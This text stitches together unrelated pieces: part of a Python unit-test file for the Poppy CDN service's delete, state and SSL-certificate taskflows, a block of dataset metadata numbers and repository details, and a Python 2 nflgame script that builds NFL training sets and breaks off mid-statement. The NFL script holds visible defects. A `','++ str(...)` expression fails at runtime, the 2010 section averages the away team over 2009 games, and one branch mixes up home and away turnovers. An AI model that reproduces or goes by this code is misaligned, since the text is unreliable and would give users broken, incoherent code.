service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'provider_details': json.dumps(
dict([(k, v.to_dict())
for k, v in service_obj.provider_details.items()])),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_flow(service_controller, storage_controller,
dns_controller)
dns_controller.delete = mock.Mock()
dns_responder_returns = self.dns_exceptions_and_succeed()
dns_controller.delete._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(delete_service.delete_service(), store=kwargs)
def test_delete_flow_dns_exception_with_retry_and_fail(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'provider_details': json.dumps(
dict([(k, v.to_dict())
for k, v in service_obj.provider_details.items()])),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_flow(service_controller, storage_controller,
dns_controller)
dns_controller.delete = mock.Mock()
dns_responder_returns = self.dns_exceptions_only()
dns_controller.delete._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(delete_service.delete_service(), store=kwargs)
def test_service_state_flow_dns_exception_retry_and_succeed(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
enable_kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'state': 'enable',
'service_obj': json.dumps(service_obj.to_dict()),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
disable_kwargs = enable_kwargs.copy()
disable_kwargs['state'] = 'disable'
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_service_state_flow(service_controller,
storage_controller,
dns_controller)
dns_responder_returns = self.dns_exceptions_and_succeed()
dns_controller.enable._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
dns_controller.disable._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(update_service_state.enable_service(),
store=enable_kwargs)
engines.run(update_service_state.disable_service(),
store=disable_kwargs)
def test_service_state_flow_dns_exception_retry_and_fail(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
enable_kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'state': 'enable',
'service_obj': json.dumps(service_obj.to_dict()),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
disable_kwargs = enable_kwargs.copy()
disable_kwargs['state'] = 'disable'
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_service_state_flow(service_controller,
storage_controller,
dns_controller)
dns_responder_returns = self.dns_exceptions_only()
dns_controller.enable._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
dns_controller.disable._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(update_service_state.enable_service(),
store=enable_kwargs)
engines.run(update_service_state.disable_service(),
store=disable_kwargs)
def test_create_ssl_certificate_normal(self):
providers = ['cdn_provider']
cert_obj_json = ssl_certificate.SSLCertificate('cdn',
'mytestsite.com',
'san')
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'cert_obj_json': json.dumps(cert_obj_json.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_create_ssl_certificate_flow(service_controller,
storage_controller,
dns_controller)
engines.run(create_ssl_certificate.create_ssl_certificate(),
store=kwargs)
def test_recreate_ssl_certificate(self):
providers = ['cdn_provider']
cert_obj_json = ssl_certificate.SSLCertificate('cdn',
'mytestsite.com',
'san')
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'domain_name': 'mytestsite.com',
'cert_type': 'san',
'cert_obj_json': json.dumps(cert_obj_json.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_recreate_ssl_certificate_flow(service_controller,
storage_controller,
dns_controller)
engines.run(recreate_ssl_certificate.recreate_ssl_certificate(),
store=kwargs)
def test_delete_ssl_certificate_normal(self):
providers = ['cdn_provider']
cert_obj = ssl_certificate.SSLCertificate(
'cdn',
'mytestsite.com',
'san',
)
kwargs = {
'cert_type': "san",
'project_id': json.dumps(str(uuid.uuid4())),
'domain_name': "mytestsite.com",
'cert_obj': json.dumps(cert_obj.to_dict()),
'providers_list': json.dumps(providers),
'flavor_id': "premium",
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_ssl_certificate_flow(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
)
engines.run(
delete_ssl_certificate.delete_ssl_certificate(),
store=kwargs
)
def test_delete_ssl_certificate_retry(self):
"""Test the retry functionality.
Test that when ``delete_ssl_certificate()`` fails,
It is retried as per the configuration.
Check that number of times the method
``delete_ssl_certificate()`` is called is equal
to retry count as per the configuration.
"""
providers = ['cdn_provider']
cert_obj = ssl_certificate.SSLCertificate(
'cdn',
'www.domain.com',
'sni',
)
kwargs = {
'cert_type': "sni",
'project_id': "123",
'domain_name': "www.domain.com",
'cert_obj': json.dumps(cert_obj.to_dict()),
'providers_list': providers,
'flavor_id': "cdn",
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_ssl_certificate_retry_flow(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
)
self.assertRaises(Exception,
engines.run,
delete_ssl_certificate.delete_ssl_certificate(),
store=kwargs)
# Check that the delete_certificate() has been called
# Five times(which is the retry count).
self.assertEqual(service_controller.provider_wrapper.
delete_certificate.call_count, 5)
def test_delete_ssl_cert_kwargs(self):
"""Test args for the delete_ssl_certificate flow.
Update a service with two domains in it by deleting
one domain from the service. Make sure the domains
are https. This should make the ``update_service taskflow``
to call ``delete_ssl_certificate taskflow``.
Test that the arguments passed to ``delete_ssl_certificate``
flow are correct.
Below is an example of arguments that the ``delete_ssl_certificate``
receives.
.. code-block:: python
kwargs = {
'project_id': '1234',
'cert_type': 'san',
'context_dict': {}
'flavor_id': 'cdn',
'providers_list': ['Akamai']
}
"""
service_id = str(uuid.uuid4())
domain1 = domain.Domain(domain='cdn.poppy.org',
protocol='https',
certificate='sni')
domain2 = domain.Domain(domain='mycdn.poppy.org',
protocol='https',
certificate='sni')
domains_old = [domain1, domain2]
domains_new = [domain2]
current_origin = origin.Origin(origin='poppy.org')
service_old = service.Service(service_id=service_id,
name='poppy cdn service',
domains=domains_old,
origins=[current_origin],
flavor_id='cdn')
service_new = service.Service(service_id=service_id,
name='poppy cdn service',
domains=domains_new,
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor
for i in range(self.total_retries)],
'service_old': json.dumps(service_old.to_dict()),
'service_obj': json.dumps(service_new.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_update_flow(service_controller, storage_controller,
dns_controller)
engines.run(update_service.update_service(), store=kwargs)
service_controller.distributed_task_controller.submit_task. \
assert_called_once_with(ANY,
context_dict=ANY,
project_id=ANY,
cert_type='san',
domain_name=u'cdn.poppy.org',
flavor_id=u'cdn',
providers_list=[])
| 43.449563
| 80
| 0.54167
| 4,882
| 54,703
| 5.717329
| 0.05551
| 0.056356
| 0.084157
| 0.066996
| 0.892985
| 0.884781
| 0.868981
| 0.861529
| 0.841072
| 0.818179
| 0
| 0.002236
| 0.378626
| 54,703
| 1,258
| 81
| 43.484102
| 0.818923
| 0.032887
| 0
| 0.781576
| 0
| 0
| 0.062806
| 0.007706
| 0
| 0
| 0
| 0
| 0.002849
| 1
| 0.033238
| false
| 0.00095
| 0.020893
| 0
| 0.058879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46a1cb1e239a2094ec24af4611b96732b3af9541
| 43,901
|
py
|
Python
|
Python Scripts/nflgame_ts_scrubber_tanh-v1.1-14i.py
|
adam-nnl/AFootball
|
e7681e763ffa71ae4a37147e239f12b3de353b47
|
[
"Apache-2.0"
] | 4
|
2017-09-08T18:42:11.000Z
|
2020-06-01T04:01:36.000Z
|
Python Scripts/nflgame_ts_scrubber_tanh-v1.1-14i.py
|
adam-nnl/AFootball
|
e7681e763ffa71ae4a37147e239f12b3de353b47
|
[
"Apache-2.0"
] | null | null | null |
Python Scripts/nflgame_ts_scrubber_tanh-v1.1-14i.py
|
adam-nnl/AFootball
|
e7681e763ffa71ae4a37147e239f12b3de353b47
|
[
"Apache-2.0"
] | null | null | null |
"""
Use nflgame api to pull out and compile stats. Export to .csv ready to be used with Erudite
"""
from decimal import Decimal, ROUND_DOWN
import nflgame
import csv
import sys
import fileinput
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is one of "yes" or "no".
"""
valid = {"yes":True, "y":True, "ye":True,
"no":False, "n":False}
if default == None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "\
"(or 'y' or 'n').\n")
print 'nflgame API loaded'
print 'Compiling training sets...'
print 'Compiling traing set for 2009 NFL season...'
season2009 = nflgame.games_gen(2009, kind="REG")
f = open('nfl2009ts_tanh_scrubbed-14i-v1.1.csv','w')
result = ''
exampleCount = 0
for g in season2009:
HT_AVG = nflgame.games_gen(2009, home=g.home, away=g.home, kind="REG") #get all games played by HOME team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
HT_YPG = 0
HT_PPG = 0
HT_YPGA = 0
HT_PPGA = 0
#HT_TOpm = 0
HT_TO = 0
HT_TA = 0
HT_QByds = 0
HT_QBatt = 0
HT_QBcomp = 0
HT_QBtd = 0
HT_QBint = 0
HT_QBR = 0
HT_WL = 0
count = 0
for h in HT_AVG:
if h.home==g.home:
HT_YPG += h.stats_home.total_yds
HT_PPG += h.score_home
#HT_TOpm = h.stats_away.turnovers - h.stats_home.turnovers
HT_TO += h.stats_home.turnovers
HT_TA += h.stats_away.turnovers
HT_YPGA += h.stats_away.total_yds
HT_PPGA += h.score_away
qb = h.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
else:
HT_YPG += h.stats_away.total_yds
HT_PPG += h.score_away
#HT_TOpm = h.stats_home.turnovers - h.stats_away.turnovers
HT_TO += h.stats_away.turnovers
HT_TA += h.stats_home.turnovers
HT_YPGA += h.stats_home.total_yds
HT_PPGA += h.score_home
qb = h.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
HT_TO = HT_TO / Decimal(count)
HT_TA = HT_TA / Decimal(count)
HT_YPG = HT_YPG / count
HT_PPG = HT_PPG / Decimal(count)
HT_PPG = Decimal(str(HT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_YPGA = HT_YPGA / count
HT_PPGA = HT_PPGA / Decimal(count)
HT_PPGA = Decimal(str(HT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_QBR = Decimal(HT_QBcomp) / Decimal(HT_QBatt)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = (HT_QBR - 30) * Decimal(0.05)
HT_QBR += ((HT_QByds / HT_QBatt) - 3) * Decimal(0.25)
HT_QBR += (HT_QBtd / HT_QBatt) * Decimal(0.2)
HT_QBR += Decimal(2.375) - ((HT_QBint / HT_QBatt) * Decimal(0.25))
HT_QBR = HT_QBR / Decimal(6)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = Decimal(str(HT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_home > g.score_away:
HT_WL = 1
elif g.score_home < g.score_away:
HT_WL = -1
#############
AT_AVG = nflgame.games_gen(2009, home=g.away, away=g.away, kind="REG") #get all games played by AWAY team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
AT_YPG = 0
AT_PPG = 0
AT_YPGA = 0
AT_PPGA = 0
#AT_TOpm = 0
AT_TO = 0
AT_TA = 0
AT_QByds = 0
AT_QBatt = 0
AT_QBcomp = 0
AT_QBtd = 0
AT_QBint = 0
AT_QBR = 0
AT_WL = 0
count = 0
for a in AT_AVG:
if a.home==g.away:
AT_YPG += a.stats_home.total_yds
AT_PPG += a.score_home
#AT_TOpm = a.stats_away.turnovers - a.stats_home.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_away.total_yds
AT_PPGA += a.score_away
qb = a.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
else:
AT_YPG += a.stats_away.total_yds
AT_PPG += a.score_away
#AT_TOpm = a.stats_home.turnovers - a.stats_away.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_home.total_yds
AT_PPGA += a.score_home
qb = a.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
AT_TO = AT_TO / Decimal(count)
AT_TA = AT_TA / Decimal(count)
AT_YPG = AT_YPG / count
AT_PPG = AT_PPG / Decimal(count)
AT_PPG = Decimal(str(AT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_YPGA = AT_YPGA / count
AT_PPGA = AT_PPGA / Decimal(count)
AT_PPGA = Decimal(str(AT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_QBR = Decimal(AT_QBcomp) / Decimal(AT_QBatt)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = (AT_QBR - 30) * Decimal(0.05)
AT_QBR += ((AT_QByds / AT_QBatt) - 3) * Decimal(0.25)
AT_QBR += (AT_QBtd / AT_QBatt) * Decimal(0.2)
AT_QBR += Decimal(2.375) - ((AT_QBint / AT_QBatt) * Decimal(0.25))
AT_QBR = AT_QBR / Decimal(6)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = Decimal(str(AT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_away > g.score_home:
AT_WL = 1
elif g.score_away < g.score_home:
AT_WL = -1
#############
#compile average stats for for AWAY team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
print 'Game data for: ' + g.home + '(h)' + ' vs. ' + g.away + '(a)'
print '-----------------------------------------------------\n'
if HT_YPG > AT_YPG:
print g.home + ' ***YPG: ' + str(HT_YPG) + '\t' + g.away + ' YPG: ' + str(AT_YPG)
elif AT_YPG > HT_YPG:
print g.home + ' YPG: ' + str(HT_YPG) + '\t' + g.away + ' ***YPG: ' + str(AT_YPG)
if HT_PPG > AT_PPG:
print g.home + ' ***PPG: ' + str(HT_PPG) + '\t' + g.away + ' PPG: ' + str(AT_PPG)
elif AT_PPG > HT_PPG:
print g.home + ' PPG: ' + str(HT_PPG) + '\t' + g.away + ' ***PPG: ' + str(AT_PPG)
#if HT_TOpm > AT_TOpm:
# print g.home + ' ***TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' TO +/-: ' + str(AT_TOpm)
#elif AT_TOpm > HT_TOpm:
# print g.home + ' TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' ***TO +/-: ' + str(AT_TOpm)
if HT_TO > AT_TO:
print g.home + ' ***TOpg: ' + str(HT_TO) + '\t' + g.away + ' TOpg: ' + str(AT_TO)
elif AT_TO > HT_TO:
print g.home + ' TOpg: ' + str(HT_TO) + '\t' + g.away + ' ***TOpg: ' + str(AT_TO)
if HT_TA > AT_TA:
print g.home + ' ***TApg: ' + str(HT_TA) + '\t' + g.away + ' TApg: ' + str(AT_TA)
elif AT_TA > HT_TA:
print g.home + ' TApg: ' + str(HT_TA) + '\t' + g.away + ' ***TApg: ' + str(AT_TA)
if HT_YPGA < AT_YPGA:
print g.home + ' ***YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' YPG-A: ' + str(AT_YPGA)
elif AT_YPGA < HT_YPGA:
print g.home + ' YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' ***YPG-A: ' + str(AT_YPGA)
if HT_PPGA < AT_PPGA:
print g.home + ' ***PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' PPG-A: ' + str(AT_PPGA)
elif AT_PPGA < HT_PPGA:
print g.home + ' PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' ***PPG-A: ' + str(AT_PPGA)
if HT_QBR > AT_QBR:
print g.home + ' ***QBR: ' + str(HT_QBR) + '\t' + g.away + ' QBR: ' + str(AT_QBR)
elif AT_QBR > HT_QBR:
print g.home + ' QBR: ' + str(HT_QBR) + '\t' + g.away + ' ***QBR: ' + str(AT_QBR)
if HT_WL > AT_WL:
print '***HOME W/L: ' + str(HT_WL) + '\t' + 'AWAY W/L: ' + str(AT_WL)
elif AT_WL > HT_WL:
print 'HOME W/L: ' + str(HT_WL) + '\t' + '***AWAY W/L: ' + str(AT_WL)
print 'HOME FINAL: ' + str(g.score_home) + '\t' + 'AWAY FINAL: ' + str(g.score_away)
print '-----------------------------------------------------\n'
choice = query_yes_no("Add game as example to training set?")
if choice:
result = str(result)+str(HT_YPG/Decimal(1000))+','+ str(HT_YPGA/Decimal(1000))+','+ str(HT_TO/Decimal(10))+','+ str(HT_TA/Decimal(10))+','+ str(HT_QBR/Decimal(100))+','+ str(HT_PPG/Decimal(100))+','+ str(HT_PPGA/Decimal(100))+','+ str(AT_YPG/Decimal(1000))+','+ str(AT_YPGA/Decimal(1000))+','+ str(AT_TO/Decimal(10))+','++ str(AT_TA/Decimal(10))+','+ str(AT_QBR/Decimal(100))+','+ str(AT_PPG/Decimal(100))+','+ str(AT_PPGA/Decimal(100))+'\n'
result = str(result)+str(HT_WL)+','+ str(AT_WL)+'\n'
exampleCount += 1
TSheader = str(exampleCount)+',14,2\n'
result = str(TSheader) + str(result)
f.write(result)
print 'Done Compiling season data...'
print 'Done exporting to .csv file...'
f.close()
print 'Compiling traing set for 2010 NFL season...'
season2009 = nflgame.games_gen(2010, kind="REG")
f = open('nfl2010ts_tanh_scrubbed-14i-v1.1.csv','w')
result = ''
exampleCount = 0
for g in season2009:
HT_AVG = nflgame.games_gen(2010, home=g.home, away=g.home, kind="REG") #get all games played by HOME team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
HT_YPG = 0
HT_PPG = 0
HT_YPGA = 0
HT_PPGA = 0
#HT_TOpm = 0
HT_TO = 0
HT_TA = 0
HT_QByds = 0
HT_QBatt = 0
HT_QBcomp = 0
HT_QBtd = 0
HT_QBint = 0
HT_QBR = 0
HT_WL = 0
count = 0
for h in HT_AVG:
if h.home==g.home:
HT_YPG += h.stats_home.total_yds
HT_PPG += h.score_home
#HT_TOpm = h.stats_away.turnovers - h.stats_home.turnovers
HT_TO += h.stats_home.turnovers
HT_TA += h.stats_away.turnovers
HT_YPGA += h.stats_away.total_yds
HT_PPGA += h.score_away
qb = h.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
else:
HT_YPG += h.stats_away.total_yds
HT_PPG += h.score_away
#HT_TOpm = h.stats_home.turnovers - h.stats_away.turnovers
HT_TO += h.stats_away.turnovers
HT_TA += h.stats_home.turnovers
HT_YPGA += h.stats_home.total_yds
HT_PPGA += h.score_home
qb = h.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
HT_TO = HT_TO / Decimal(count)
HT_TA = HT_TA / Decimal(count)
HT_YPG = HT_YPG / count
HT_PPG = HT_PPG / Decimal(count)
HT_PPG = Decimal(str(HT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_YPGA = HT_YPGA / count
HT_PPGA = HT_PPGA / Decimal(count)
HT_PPGA = Decimal(str(HT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_QBR = Decimal(HT_QBcomp) / Decimal(HT_QBatt)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = (HT_QBR - 30) * Decimal(0.05)
HT_QBR += ((HT_QByds / HT_QBatt) - 3) * Decimal(0.25)
HT_QBR += (HT_QBtd / HT_QBatt) * Decimal(0.2)
HT_QBR += Decimal(2.375) - ((HT_QBint / HT_QBatt) * Decimal(0.25))
HT_QBR = HT_QBR / Decimal(6)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = Decimal(str(HT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_home > g.score_away:
HT_WL = 1
elif g.score_home < g.score_away:
HT_WL = -1
#############
AT_AVG = nflgame.games_gen(2009, home=g.away, away=g.away, kind="REG") #get all games played by AWAY team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
AT_YPG = 0
AT_PPG = 0
AT_YPGA = 0
AT_PPGA = 0
#AT_TOpm = 0
AT_TO = 0
AT_TA = 0
AT_QByds = 0
AT_QBatt = 0
AT_QBcomp = 0
AT_QBtd = 0
AT_QBint = 0
AT_QBR = 0
AT_WL = 0
count = 0
for a in AT_AVG:
if a.home==g.away:
AT_YPG += a.stats_home.total_yds
AT_PPG += a.score_home
#AT_TOpm = a.stats_away.turnovers - a.stats_home.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_away.total_yds
AT_PPGA += a.score_away
qb = a.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
else:
AT_YPG += a.stats_away.total_yds
AT_PPG += a.score_away
#AT_TOpm = a.stats_home.turnovers - a.stats_away.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_home.total_yds
AT_PPGA += a.score_home
qb = a.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
AT_TO = AT_TO / Decimal(count)
AT_TA = AT_TA / Decimal(count)
AT_YPG = AT_YPG / count
AT_PPG = AT_PPG / Decimal(count)
AT_PPG = Decimal(str(AT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_YPGA = AT_YPGA / count
AT_PPGA = AT_PPGA / Decimal(count)
AT_PPGA = Decimal(str(AT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_QBR = Decimal(AT_QBcomp) / Decimal(AT_QBatt)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = (AT_QBR - 30) * Decimal(0.05)
AT_QBR += ((AT_QByds / AT_QBatt) - 3) * Decimal(0.25)
AT_QBR += (AT_QBtd / AT_QBatt) * Decimal(0.2)
AT_QBR += Decimal(2.375) - ((AT_QBint / AT_QBatt) * Decimal(0.25))
AT_QBR = AT_QBR / Decimal(6)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = Decimal(str(AT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_away > g.score_home:
AT_WL = 1
elif g.score_away < g.score_home:
AT_WL = -1
#############
#compile average stats for for AWAY team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
print 'Game data for: ' + g.home + '(h)' + ' vs. ' + g.away + '(a)'
print '-----------------------------------------------------\n'
if HT_YPG > AT_YPG:
print g.home + ' ***YPG: ' + str(HT_YPG) + '\t' + g.away + ' YPG: ' + str(AT_YPG)
elif AT_YPG > HT_YPG:
print g.home + ' YPG: ' + str(HT_YPG) + '\t' + g.away + ' ***YPG: ' + str(AT_YPG)
if HT_PPG > AT_PPG:
print g.home + ' ***PPG: ' + str(HT_PPG) + '\t' + g.away + ' PPG: ' + str(AT_PPG)
elif AT_PPG > HT_PPG:
print g.home + ' PPG: ' + str(HT_PPG) + '\t' + g.away + ' ***PPG: ' + str(AT_PPG)
#if HT_TOpm > AT_TOpm:
# print g.home + ' ***TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' TO +/-: ' + str(AT_TOpm)
#elif AT_TOpm > HT_TOpm:
# print g.home + ' TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' ***TO +/-: ' + str(AT_TOpm)
if HT_TO > AT_TO:
print g.home + ' ***TOpg: ' + str(HT_TO) + '\t' + g.away + ' TOpg: ' + str(AT_TO)
elif AT_TO > HT_TO:
print g.home + ' TOpg: ' + str(HT_TO) + '\t' + g.away + ' ***TOpg: ' + str(AT_TO)
if HT_TA > AT_TA:
print g.home + ' ***TApg: ' + str(HT_TA) + '\t' + g.away + ' TApg: ' + str(AT_TA)
elif AT_TA > HT_TA:
print g.home + ' TApg: ' + str(HT_TA) + '\t' + g.away + ' ***TApg: ' + str(AT_TA)
if HT_YPGA < AT_YPGA:
print g.home + ' ***YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' YPG-A: ' + str(AT_YPGA)
elif AT_YPGA < HT_YPGA:
print g.home + ' YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' ***YPG-A: ' + str(AT_YPGA)
if HT_PPGA < AT_PPGA:
print g.home + ' ***PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' PPG-A: ' + str(AT_PPGA)
elif AT_PPGA < HT_PPGA:
print g.home + ' PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' ***PPG-A: ' + str(AT_PPGA)
if HT_QBR > AT_QBR:
print g.home + ' ***QBR: ' + str(HT_QBR) + '\t' + g.away + ' QBR: ' + str(AT_QBR)
elif AT_QBR > HT_QBR:
